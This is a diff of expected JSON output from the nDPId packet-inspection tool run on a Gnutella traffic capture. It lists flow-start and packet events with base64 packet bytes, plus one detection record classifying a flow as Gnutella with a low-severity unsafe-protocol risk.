-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":70171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70171,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kJAAIAGdAcKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70171,"flow_last_seen":70171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70171,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":50240,"dst_port":21293,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":70171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70171,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Rm9AAIAGeMEKAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70171,"flow_last_seen":70171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70171,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.18.172.208","src_port":50241,"dst_port":63172,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":70171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70171,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A95AAIAG2\/QKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70172,"flow_last_seen":70172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70172,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":70172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70172,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJpAAIAGiMUKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70172,"flow_last_seen":70172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":70172,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":70172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70172,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UWtAAIAGasMKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":65240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":65240,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAp8AAEAGUxwOxwo8CgACD1uixCMAa2wB\/Z82JWAS\/\/+zDQAAAgQFtA=="} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":65241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":65241,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSFFAAIAGjW0KAAIPDscKPMQjW6L9nzYlAGtsAlAQ+vDP2QAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xttAAIAGndgKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1tAAIAGzIQKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq1AAIAGH9UKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66076,"flow_last_seen":66076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":66076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTdAAIAG3SoKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66077,"flow_last_seen":66077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66077,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":66077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0CoxAAIAGJkgKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66077,"flow_last_seen":66077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66077,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":50216,"dst_port":3256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":66077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdlAAIAGUVwKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66078,"flow_last_seen":66078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66078,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":66078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66078,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8JAAIAGrlQKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66078,"flow_last_seen":66078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66078,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":66078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66078,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EU5AAIAGi6EKAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":66079,"flow_last_seen":66079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":66079,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":66079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66079,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gY5AAIAGBqEKAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpRAAIAGVgYKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FYBAAIAGQksKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":67044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67044,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTFAAIAGk6oKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67092,"flow_last_seen":67092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67092,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":67092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7lAAIAGcTAKAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67093,"flow_last_seen":67093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67093,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":67093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faFAAIAGiKYKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67093,"flow_last_seen":67093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67093,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":67093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0TEpAAIAGm28KAAIPdw6P7cQuGXtEBOluAAAAAIAC+vBV+AAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67094,"flow_last_seen":67094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67094,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":67094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67094,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R0xAAIAGN+UKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} +00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67094,"flow_last_seen":67094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67094,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":67094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67094,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtBAAIAGDgcKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":67095,"flow_last_seen":67095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":67095,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":67095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67095,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zZAAIAGNBkKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":67457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":67457,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqUAAP8GpiB3Do\/tCgACDxl7xC4AAAAARATpb1AUAACRqAAA"} +00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":67657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":67657,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqYAAP8Gw08k6cTiCgACDw7sxCwAAAAAEwSaoFAUAAA5OQAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":67969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":67969,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0TEtAAIAGm24KAAIPdw6P7cQuGXtEBOluAAAAAIAC+vBV+AAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWtAAIAG8s0KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8xAAIAGVuUKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW9AAIAGEbYKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVtAAIAG3iAKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":68075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68075,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YFAAIAG1DgKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} 